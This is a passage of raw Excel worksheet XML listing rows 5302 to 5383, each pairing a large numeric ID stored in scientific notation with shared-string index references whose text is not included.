    <row r="5302" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5302">
        <v>1.2341511827608901E+18</v>
      </c>
      <c r="B5302" t="s">
        <v>13096</v>
      </c>
      <c r="C5302" t="s">
        <v>1</v>
      </c>
      <c r="D5302" t="s">
        <v>13097</v>
      </c>
      <c r="E5302" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="5303" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5303">
        <v>1.2341467231629199E+18</v>
      </c>
      <c r="B5303" t="s">
        <v>13098</v>
      </c>
      <c r="C5303" t="s">
        <v>1</v>
      </c>
      <c r="D5303" t="s">
        <v>13099</v>
      </c>
      <c r="E5303" t="s">
        <v>1972</v>
      </c>
    </row>
    <row r="5304" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5304">
        <v>1.23414650395584E+18</v>
      </c>
      <c r="B5304" t="s">
        <v>13100</v>
      </c>
      <c r="C5304" t="s">
        <v>1</v>
      </c>
      <c r="D5304" t="s">
        <v>13101</v>
      </c>
      <c r="E5304" t="s">
        <v>13102</v>
      </c>
    </row>
    <row r="5305" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5305">
        <v>1.2341455001165199E+18</v>
      </c>
      <c r="B5305" t="s">
        <v>13103</v>
      </c>
      <c r="C5305" t="s">
        <v>1</v>
      </c>
      <c r="D5305" t="s">
        <v>13104</v>
      </c>
      <c r="E5305" t="s">
        <v>13105</v>
      </c>
    </row>
    <row r="5306" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5306">
        <v>1.2341449700823099E+18</v>
      </c>
      <c r="B5306" t="s">
        <v>13106</v>
      </c>
      <c r="C5306" t="s">
        <v>1</v>
      </c>
      <c r="D5306" t="s">
        <v>13107</v>
      </c>
      <c r="E5306" t="s">
        <v>2612</v>
      </c>
    </row>
    <row r="5307" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5307">
        <v>1.2341426568775301E+18</v>
      </c>
      <c r="B5307" t="s">
        <v>13108</v>
      </c>
      <c r="C5307" t="s">
        <v>1</v>
      </c>
      <c r="D5307" t="s">
        <v>13109</v>
      </c>
      <c r="E5307" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="5308" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5308">
        <v>1.2341418614152E+18</v>
      </c>
      <c r="B5308" t="s">
        <v>13110</v>
      </c>
      <c r="C5308" t="s">
        <v>1</v>
      </c>
      <c r="D5308" t="s">
        <v>13111</v>
      </c>
      <c r="E5308" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5309" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5309">
        <v>1.23414119479347E+18</v>
      </c>
      <c r="B5309" t="s">
        <v>13112</v>
      </c>
      <c r="C5309" t="s">
        <v>1</v>
      </c>
      <c r="D5309" t="s">
        <v>13113</v>
      </c>
      <c r="E5309" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="5310" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5310">
        <v>1.2341396752264599E+18</v>
      </c>
      <c r="B5310" t="s">
        <v>13114</v>
      </c>
      <c r="C5310" t="s">
        <v>1</v>
      </c>
      <c r="D5310" t="s">
        <v>13115</v>
      </c>
      <c r="E5310" t="s">
        <v>1595</v>
      </c>
    </row>
    <row r="5311" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5311">
        <v>1.23413883196162E+18</v>
      </c>
      <c r="B5311" t="s">
        <v>13116</v>
      </c>
      <c r="C5311" t="s">
        <v>1</v>
      </c>
      <c r="D5311" t="s">
        <v>13117</v>
      </c>
      <c r="E5311" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5312" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5312">
        <v>1.23413808080799E+18</v>
      </c>
      <c r="B5312" t="s">
        <v>13118</v>
      </c>
      <c r="C5312" t="s">
        <v>1</v>
      </c>
      <c r="D5312" t="s">
        <v>13119</v>
      </c>
      <c r="E5312" t="s">
        <v>13120</v>
      </c>
    </row>
    <row r="5313" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5313">
        <v>1.23413799452688E+18</v>
      </c>
      <c r="B5313" t="s">
        <v>13121</v>
      </c>
      <c r="C5313" t="s">
        <v>1</v>
      </c>
      <c r="D5313" t="s">
        <v>13122</v>
      </c>
      <c r="E5313" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="5314" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5314">
        <v>1.2341366681495099E+18</v>
      </c>
      <c r="B5314" t="s">
        <v>13123</v>
      </c>
      <c r="C5314" t="s">
        <v>1</v>
      </c>
      <c r="D5314" t="s">
        <v>13124</v>
      </c>
      <c r="E5314" t="s">
        <v>13125</v>
      </c>
    </row>
    <row r="5315" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5315">
        <v>1.23413632444307E+18</v>
      </c>
      <c r="B5315" t="s">
        <v>13126</v>
      </c>
      <c r="C5315" t="s">
        <v>1</v>
      </c>
      <c r="D5315" t="s">
        <v>2456</v>
      </c>
      <c r="E5315" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="5316" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5316">
        <v>1.2341361030467699E+18</v>
      </c>
      <c r="B5316" t="s">
        <v>13127</v>
      </c>
      <c r="C5316" t="s">
        <v>1</v>
      </c>
      <c r="D5316" t="s">
        <v>13128</v>
      </c>
      <c r="E5316" t="s">
        <v>13129</v>
      </c>
    </row>
    <row r="5317" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5317">
        <v>1.23413556214514E+18</v>
      </c>
      <c r="B5317" t="s">
        <v>13130</v>
      </c>
      <c r="C5317" t="s">
        <v>1</v>
      </c>
      <c r="D5317" t="s">
        <v>13131</v>
      </c>
      <c r="E5317" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="5318" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5318">
        <v>1.2341349123174799E+18</v>
      </c>
      <c r="B5318" t="s">
        <v>13132</v>
      </c>
      <c r="C5318" t="s">
        <v>1</v>
      </c>
      <c r="D5318" t="s">
        <v>13133</v>
      </c>
      <c r="E5318" t="s">
        <v>10687</v>
      </c>
    </row>
    <row r="5319" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5319">
        <v>1.2341339927372401E+18</v>
      </c>
      <c r="B5319" t="s">
        <v>13134</v>
      </c>
      <c r="C5319" t="s">
        <v>1</v>
      </c>
      <c r="D5319" t="s">
        <v>13135</v>
      </c>
      <c r="E5319" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="5320" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5320">
        <v>1.2341338348970501E+18</v>
      </c>
      <c r="B5320" t="s">
        <v>13136</v>
      </c>
      <c r="C5320" t="s">
        <v>1</v>
      </c>
      <c r="D5320" t="s">
        <v>13137</v>
      </c>
      <c r="E5320" t="s">
        <v>4928</v>
      </c>
    </row>
    <row r="5321" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5321">
        <v>1.23413380111214E+18</v>
      </c>
      <c r="B5321" t="s">
        <v>13138</v>
      </c>
      <c r="C5321" t="s">
        <v>1</v>
      </c>
      <c r="D5321" t="s">
        <v>13139</v>
      </c>
      <c r="E5321" t="s">
        <v>786</v>
      </c>
    </row>
    <row r="5322" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5322">
        <v>1.2341328048684301E+18</v>
      </c>
      <c r="B5322" t="s">
        <v>13140</v>
      </c>
      <c r="C5322" t="s">
        <v>1</v>
      </c>
      <c r="D5322" t="s">
        <v>13141</v>
      </c>
      <c r="E5322" t="s">
        <v>13142</v>
      </c>
    </row>
    <row r="5323" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5323">
        <v>1.2341320664066701E+18</v>
      </c>
      <c r="B5323" t="s">
        <v>13143</v>
      </c>
      <c r="C5323" t="s">
        <v>1</v>
      </c>
      <c r="D5323" t="s">
        <v>13144</v>
      </c>
      <c r="E5323" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="5324" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5324">
        <v>1.23413160611955E+18</v>
      </c>
      <c r="B5324" t="s">
        <v>13146</v>
      </c>
      <c r="C5324" t="s">
        <v>1</v>
      </c>
      <c r="D5324" t="s">
        <v>13147</v>
      </c>
      <c r="E5324" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="5325" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5325">
        <v>1.23413157581986E+18</v>
      </c>
      <c r="B5325" t="s">
        <v>13148</v>
      </c>
      <c r="C5325" t="s">
        <v>1</v>
      </c>
      <c r="D5325" t="s">
        <v>13149</v>
      </c>
      <c r="E5325" t="s">
        <v>9392</v>
      </c>
    </row>
    <row r="5326" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5326">
        <v>1.23413136753906E+18</v>
      </c>
      <c r="B5326" t="s">
        <v>13150</v>
      </c>
      <c r="C5326" t="s">
        <v>1</v>
      </c>
      <c r="D5326" t="s">
        <v>13151</v>
      </c>
      <c r="E5326" t="s">
        <v>13152</v>
      </c>
    </row>
    <row r="5327" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5327">
        <v>1.2341312956655201E+18</v>
      </c>
      <c r="B5327" t="s">
        <v>13153</v>
      </c>
      <c r="C5327" t="s">
        <v>1</v>
      </c>
      <c r="D5327" t="s">
        <v>13154</v>
      </c>
      <c r="E5327" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5328" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5328">
        <v>1.2341312931195699E+18</v>
      </c>
      <c r="B5328" t="s">
        <v>13155</v>
      </c>
      <c r="C5328" t="s">
        <v>1</v>
      </c>
      <c r="D5328" t="s">
        <v>13156</v>
      </c>
      <c r="E5328" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="5329" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5329">
        <v>1.23413125074461E+18</v>
      </c>
      <c r="B5329" t="s">
        <v>13157</v>
      </c>
      <c r="C5329" t="s">
        <v>1</v>
      </c>
      <c r="D5329" t="s">
        <v>13158</v>
      </c>
      <c r="E5329" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5330" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5330">
        <v>1.2341305001906501E+18</v>
      </c>
      <c r="B5330" t="s">
        <v>13159</v>
      </c>
      <c r="C5330" t="s">
        <v>1</v>
      </c>
      <c r="D5330" t="s">
        <v>13160</v>
      </c>
      <c r="E5330" t="s">
        <v>13161</v>
      </c>
    </row>
    <row r="5331" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5331">
        <v>1.23412939398909E+18</v>
      </c>
      <c r="B5331" t="s">
        <v>13162</v>
      </c>
      <c r="C5331" t="s">
        <v>1</v>
      </c>
      <c r="D5331" t="s">
        <v>13163</v>
      </c>
      <c r="E5331" t="s">
        <v>13161</v>
      </c>
    </row>
    <row r="5332" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5332">
        <v>1.23412856707375E+18</v>
      </c>
      <c r="B5332" t="s">
        <v>13164</v>
      </c>
      <c r="C5332" t="s">
        <v>1</v>
      </c>
      <c r="D5332" t="s">
        <v>13165</v>
      </c>
      <c r="E5332" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5333" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5333">
        <v>1.23412769052291E+18</v>
      </c>
      <c r="B5333" t="s">
        <v>13166</v>
      </c>
      <c r="C5333" t="s">
        <v>1</v>
      </c>
      <c r="D5333" t="s">
        <v>13167</v>
      </c>
      <c r="E5333" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="5334" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5334">
        <v>1.23412748177235E+18</v>
      </c>
      <c r="B5334" t="s">
        <v>13168</v>
      </c>
      <c r="C5334" t="s">
        <v>1</v>
      </c>
      <c r="D5334" t="s">
        <v>13169</v>
      </c>
      <c r="E5334" t="s">
        <v>6381</v>
      </c>
    </row>
    <row r="5335" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5335">
        <v>1.2341272320434501E+18</v>
      </c>
      <c r="B5335" t="s">
        <v>13170</v>
      </c>
      <c r="C5335" t="s">
        <v>1</v>
      </c>
      <c r="D5335" t="s">
        <v>13171</v>
      </c>
      <c r="E5335" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5336" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5336">
        <v>1.2341270455144399E+18</v>
      </c>
      <c r="B5336" t="s">
        <v>13172</v>
      </c>
      <c r="C5336" t="s">
        <v>1</v>
      </c>
      <c r="D5336" t="s">
        <v>13173</v>
      </c>
      <c r="E5336" t="s">
        <v>13174</v>
      </c>
    </row>
    <row r="5337" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5337">
        <v>1.2341265900842501E+18</v>
      </c>
      <c r="B5337" t="s">
        <v>13175</v>
      </c>
      <c r="C5337" t="s">
        <v>1</v>
      </c>
      <c r="D5337" t="s">
        <v>13176</v>
      </c>
      <c r="E5337" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="5338" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5338">
        <v>1.23412621995378E+18</v>
      </c>
      <c r="B5338" t="s">
        <v>13177</v>
      </c>
      <c r="C5338" t="s">
        <v>1</v>
      </c>
      <c r="D5338" t="s">
        <v>13178</v>
      </c>
      <c r="E5338" t="s">
        <v>13161</v>
      </c>
    </row>
    <row r="5339" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5339">
        <v>1.2341260666226099E+18</v>
      </c>
      <c r="B5339" t="s">
        <v>13179</v>
      </c>
      <c r="C5339" t="s">
        <v>1</v>
      </c>
      <c r="D5339" t="s">
        <v>13180</v>
      </c>
      <c r="E5339" t="s">
        <v>7705</v>
      </c>
    </row>
    <row r="5340" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5340">
        <v>1.23412594664877E+18</v>
      </c>
      <c r="B5340" t="s">
        <v>13181</v>
      </c>
      <c r="C5340" t="s">
        <v>1</v>
      </c>
      <c r="D5340" t="s">
        <v>13182</v>
      </c>
      <c r="E5340" t="s">
        <v>12273</v>
      </c>
    </row>
    <row r="5341" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5341">
        <v>1.23412567445938E+18</v>
      </c>
      <c r="B5341" t="s">
        <v>13183</v>
      </c>
      <c r="C5341" t="s">
        <v>1</v>
      </c>
      <c r="D5341" t="s">
        <v>13184</v>
      </c>
      <c r="E5341" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5342" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5342">
        <v>1.2341256502373E+18</v>
      </c>
      <c r="B5342" t="s">
        <v>13185</v>
      </c>
      <c r="C5342" t="s">
        <v>1</v>
      </c>
      <c r="D5342" t="s">
        <v>13186</v>
      </c>
      <c r="E5342" t="s">
        <v>13187</v>
      </c>
    </row>
    <row r="5343" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5343">
        <v>1.2341245694573801E+18</v>
      </c>
      <c r="B5343" t="s">
        <v>13188</v>
      </c>
      <c r="C5343" t="s">
        <v>1</v>
      </c>
      <c r="D5343" t="s">
        <v>13189</v>
      </c>
      <c r="E5343" t="s">
        <v>13190</v>
      </c>
    </row>
    <row r="5344" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5344">
        <v>1.23412422941263E+18</v>
      </c>
      <c r="B5344" t="s">
        <v>13191</v>
      </c>
      <c r="C5344" t="s">
        <v>1</v>
      </c>
      <c r="D5344" t="s">
        <v>13192</v>
      </c>
      <c r="E5344" t="s">
        <v>5865</v>
      </c>
    </row>
    <row r="5345" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5345">
        <v>1.2341234256035999E+18</v>
      </c>
      <c r="B5345" t="s">
        <v>13193</v>
      </c>
      <c r="C5345" t="s">
        <v>1</v>
      </c>
      <c r="D5345" t="s">
        <v>13194</v>
      </c>
      <c r="E5345" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="5346" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5346">
        <v>1.2341224800564401E+18</v>
      </c>
      <c r="B5346" t="s">
        <v>13195</v>
      </c>
      <c r="C5346" t="s">
        <v>1</v>
      </c>
      <c r="D5346" t="s">
        <v>13196</v>
      </c>
      <c r="E5346" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="5347" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5347">
        <v>1.23412196601937E+18</v>
      </c>
      <c r="B5347" t="s">
        <v>13198</v>
      </c>
      <c r="C5347" t="s">
        <v>1</v>
      </c>
      <c r="D5347" t="s">
        <v>13199</v>
      </c>
      <c r="E5347" t="s">
        <v>13200</v>
      </c>
    </row>
    <row r="5348" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5348">
        <v>1.23412151865485E+18</v>
      </c>
      <c r="B5348" t="s">
        <v>13201</v>
      </c>
      <c r="C5348" t="s">
        <v>1</v>
      </c>
      <c r="D5348" t="s">
        <v>13202</v>
      </c>
      <c r="E5348" t="s">
        <v>2615</v>
      </c>
    </row>
    <row r="5349" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5349">
        <v>1.2341209594197399E+18</v>
      </c>
      <c r="B5349" t="s">
        <v>13203</v>
      </c>
      <c r="C5349" t="s">
        <v>1</v>
      </c>
      <c r="D5349" t="s">
        <v>13204</v>
      </c>
      <c r="E5349" t="s">
        <v>6258</v>
      </c>
    </row>
    <row r="5350" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5350">
        <v>1.2341204100667699E+18</v>
      </c>
      <c r="B5350" t="s">
        <v>13205</v>
      </c>
      <c r="C5350" t="s">
        <v>1</v>
      </c>
      <c r="D5350" t="s">
        <v>13206</v>
      </c>
      <c r="E5350" t="s">
        <v>13207</v>
      </c>
    </row>
    <row r="5351" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5351">
        <v>1.23412021977122E+18</v>
      </c>
      <c r="B5351" t="s">
        <v>13208</v>
      </c>
      <c r="C5351" t="s">
        <v>1</v>
      </c>
      <c r="D5351" t="s">
        <v>13209</v>
      </c>
      <c r="E5351" t="s">
        <v>13210</v>
      </c>
    </row>
    <row r="5352" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5352">
        <v>1.2341193006020401E+18</v>
      </c>
      <c r="B5352" t="s">
        <v>13211</v>
      </c>
      <c r="C5352" t="s">
        <v>1</v>
      </c>
      <c r="D5352" t="s">
        <v>13212</v>
      </c>
      <c r="E5352" t="s">
        <v>13213</v>
      </c>
    </row>
    <row r="5353" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5353">
        <v>1.23411917770893E+18</v>
      </c>
      <c r="B5353" t="s">
        <v>13214</v>
      </c>
      <c r="C5353" t="s">
        <v>1</v>
      </c>
      <c r="D5353" t="s">
        <v>13215</v>
      </c>
      <c r="E5353" t="s">
        <v>13216</v>
      </c>
    </row>
    <row r="5354" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5354">
        <v>1.23411835054593E+18</v>
      </c>
      <c r="B5354" t="s">
        <v>13217</v>
      </c>
      <c r="C5354" t="s">
        <v>1</v>
      </c>
      <c r="D5354" t="s">
        <v>13218</v>
      </c>
      <c r="E5354" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="5355" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5355">
        <v>1.23411770695533E+18</v>
      </c>
      <c r="B5355" t="s">
        <v>13219</v>
      </c>
      <c r="C5355" t="s">
        <v>1</v>
      </c>
      <c r="D5355" t="s">
        <v>13220</v>
      </c>
      <c r="E5355" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="5356" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5356">
        <v>1.2341172859436301E+18</v>
      </c>
      <c r="B5356" t="s">
        <v>13221</v>
      </c>
      <c r="C5356" t="s">
        <v>1</v>
      </c>
      <c r="D5356" t="s">
        <v>13222</v>
      </c>
      <c r="E5356" t="s">
        <v>13223</v>
      </c>
    </row>
    <row r="5357" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5357">
        <v>1.23411648046947E+18</v>
      </c>
      <c r="B5357" t="s">
        <v>13224</v>
      </c>
      <c r="C5357" t="s">
        <v>1</v>
      </c>
      <c r="D5357" t="s">
        <v>13225</v>
      </c>
      <c r="E5357" t="s">
        <v>4770</v>
      </c>
    </row>
    <row r="5358" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5358">
        <v>1.2341161903789E+18</v>
      </c>
      <c r="B5358" t="s">
        <v>13226</v>
      </c>
      <c r="C5358" t="s">
        <v>1</v>
      </c>
      <c r="D5358" t="s">
        <v>13227</v>
      </c>
      <c r="E5358" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="5359" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5359">
        <v>1.2341160361291E+18</v>
      </c>
      <c r="B5359" t="s">
        <v>13228</v>
      </c>
      <c r="C5359" t="s">
        <v>1</v>
      </c>
      <c r="D5359" t="s">
        <v>13229</v>
      </c>
      <c r="E5359" t="s">
        <v>13230</v>
      </c>
    </row>
    <row r="5360" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5360">
        <v>1.23411378213537E+18</v>
      </c>
      <c r="B5360" t="s">
        <v>13231</v>
      </c>
      <c r="C5360" t="s">
        <v>1</v>
      </c>
      <c r="D5360" t="s">
        <v>13232</v>
      </c>
      <c r="E5360" t="s">
        <v>13233</v>
      </c>
    </row>
    <row r="5361" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5361">
        <v>1.2341111599277901E+18</v>
      </c>
      <c r="B5361" t="s">
        <v>13234</v>
      </c>
      <c r="C5361" t="s">
        <v>1</v>
      </c>
      <c r="D5361" t="s">
        <v>13235</v>
      </c>
      <c r="E5361" t="s">
        <v>9392</v>
      </c>
    </row>
    <row r="5362" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5362">
        <v>1.2341111507548001E+18</v>
      </c>
      <c r="B5362" t="s">
        <v>13236</v>
      </c>
      <c r="C5362" t="s">
        <v>1</v>
      </c>
      <c r="D5362" t="s">
        <v>13237</v>
      </c>
      <c r="E5362" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="5363" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5363">
        <v>1.2341106220794701E+18</v>
      </c>
      <c r="B5363" t="s">
        <v>13238</v>
      </c>
      <c r="C5363" t="s">
        <v>1</v>
      </c>
      <c r="D5363" t="s">
        <v>13239</v>
      </c>
      <c r="E5363" t="s">
        <v>10228</v>
      </c>
    </row>
    <row r="5364" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5364">
        <v>1.2341086534410199E+18</v>
      </c>
      <c r="B5364" t="s">
        <v>13240</v>
      </c>
      <c r="C5364" t="s">
        <v>1</v>
      </c>
      <c r="D5364" t="s">
        <v>13241</v>
      </c>
      <c r="E5364" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5365" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5365">
        <v>1.2341086469482399E+18</v>
      </c>
      <c r="B5365" t="s">
        <v>13242</v>
      </c>
      <c r="C5365" t="s">
        <v>1</v>
      </c>
      <c r="D5365" t="s">
        <v>13243</v>
      </c>
      <c r="E5365" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="5366" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5366">
        <v>1.2341084956471199E+18</v>
      </c>
      <c r="B5366" t="s">
        <v>13244</v>
      </c>
      <c r="C5366" t="s">
        <v>1</v>
      </c>
      <c r="D5366" t="s">
        <v>13245</v>
      </c>
      <c r="E5366" t="s">
        <v>13246</v>
      </c>
    </row>
    <row r="5367" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5367">
        <v>1.2341084333952699E+18</v>
      </c>
      <c r="B5367" t="s">
        <v>13247</v>
      </c>
      <c r="C5367" t="s">
        <v>1</v>
      </c>
      <c r="D5367" t="s">
        <v>13248</v>
      </c>
      <c r="E5367" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="5368" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5368">
        <v>1.2341077736606001E+18</v>
      </c>
      <c r="B5368" t="s">
        <v>13249</v>
      </c>
      <c r="C5368" t="s">
        <v>1</v>
      </c>
      <c r="D5368" t="s">
        <v>13250</v>
      </c>
      <c r="E5368" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5369" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5369">
        <v>1.23410726703058E+18</v>
      </c>
      <c r="B5369" t="s">
        <v>13251</v>
      </c>
      <c r="C5369" t="s">
        <v>1</v>
      </c>
      <c r="D5369" t="s">
        <v>13252</v>
      </c>
      <c r="E5369" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5370" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5370">
        <v>1.2341052253147799E+18</v>
      </c>
      <c r="B5370" t="s">
        <v>13253</v>
      </c>
      <c r="C5370" t="s">
        <v>1</v>
      </c>
      <c r="D5370" t="s">
        <v>13254</v>
      </c>
      <c r="E5370" t="s">
        <v>1816</v>
      </c>
    </row>
    <row r="5371" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5371">
        <v>1.2341051163005701E+18</v>
      </c>
      <c r="B5371" t="s">
        <v>13255</v>
      </c>
      <c r="C5371" t="s">
        <v>1</v>
      </c>
      <c r="D5371" t="s">
        <v>13256</v>
      </c>
      <c r="E5371" t="s">
        <v>1150</v>
      </c>
    </row>
    <row r="5372" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5372">
        <v>1.2341046550906099E+18</v>
      </c>
      <c r="B5372" t="s">
        <v>13257</v>
      </c>
      <c r="C5372" t="s">
        <v>1</v>
      </c>
      <c r="D5372" t="s">
        <v>13258</v>
      </c>
      <c r="E5372" t="s">
        <v>13259</v>
      </c>
    </row>
    <row r="5373" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5373">
        <v>1.2341044469357901E+18</v>
      </c>
      <c r="B5373" t="s">
        <v>13260</v>
      </c>
      <c r="C5373" t="s">
        <v>1</v>
      </c>
      <c r="D5373" t="s">
        <v>13261</v>
      </c>
      <c r="E5373" t="s">
        <v>13262</v>
      </c>
    </row>
    <row r="5374" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5374">
        <v>1.23410436226545E+18</v>
      </c>
      <c r="B5374" t="s">
        <v>13263</v>
      </c>
      <c r="C5374" t="s">
        <v>1</v>
      </c>
      <c r="D5374" t="s">
        <v>13264</v>
      </c>
      <c r="E5374" t="s">
        <v>6223</v>
      </c>
    </row>
    <row r="5375" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5375">
        <v>1.2341042729518799E+18</v>
      </c>
      <c r="B5375" t="s">
        <v>13265</v>
      </c>
      <c r="C5375" t="s">
        <v>1</v>
      </c>
      <c r="D5375" t="s">
        <v>13266</v>
      </c>
      <c r="E5375" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="5376" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5376">
        <v>1.2341036093543301E+18</v>
      </c>
      <c r="B5376" t="s">
        <v>13267</v>
      </c>
      <c r="C5376" t="s">
        <v>1</v>
      </c>
      <c r="D5376" t="s">
        <v>13268</v>
      </c>
      <c r="E5376" t="s">
        <v>2579</v>
      </c>
    </row>
    <row r="5377" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5377">
        <v>1.2341034322959601E+18</v>
      </c>
      <c r="B5377" t="s">
        <v>13269</v>
      </c>
      <c r="C5377" t="s">
        <v>1</v>
      </c>
      <c r="D5377" t="s">
        <v>13270</v>
      </c>
      <c r="E5377" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="5378" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5378">
        <v>1.23410189674849E+18</v>
      </c>
      <c r="B5378" t="s">
        <v>13271</v>
      </c>
      <c r="C5378" t="s">
        <v>1</v>
      </c>
      <c r="D5378" t="s">
        <v>13272</v>
      </c>
      <c r="E5378" t="s">
        <v>13273</v>
      </c>
    </row>
    <row r="5379" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5379">
        <v>1.2341016028747799E+18</v>
      </c>
      <c r="B5379" t="s">
        <v>13274</v>
      </c>
      <c r="C5379" t="s">
        <v>1</v>
      </c>
      <c r="D5379" t="s">
        <v>13275</v>
      </c>
      <c r="E5379" t="s">
        <v>13276</v>
      </c>
    </row>
    <row r="5380" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5380">
        <v>1.2341013991322099E+18</v>
      </c>
      <c r="B5380" t="s">
        <v>13277</v>
      </c>
      <c r="C5380" t="s">
        <v>1</v>
      </c>
      <c r="D5380" t="s">
        <v>13278</v>
      </c>
      <c r="E5380" t="s">
        <v>13279</v>
      </c>
    </row>
    <row r="5381" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5381">
        <v>1.23410123546209E+18</v>
      </c>
      <c r="B5381" t="s">
        <v>13280</v>
      </c>
      <c r="C5381" t="s">
        <v>1</v>
      </c>
      <c r="D5381" t="s">
        <v>13281</v>
      </c>
      <c r="E5381" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="5382" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5382">
        <v>1.23410121421378E+18</v>
      </c>
      <c r="B5382" t="s">
        <v>13282</v>
      </c>
      <c r="C5382" t="s">
        <v>1</v>
      </c>
      <c r="D5382" t="s">
        <v>13283</v>
      </c>
      <c r="E5382" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="5383" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5383">
        <v>1.23410108133808E+18</v>
      </c>
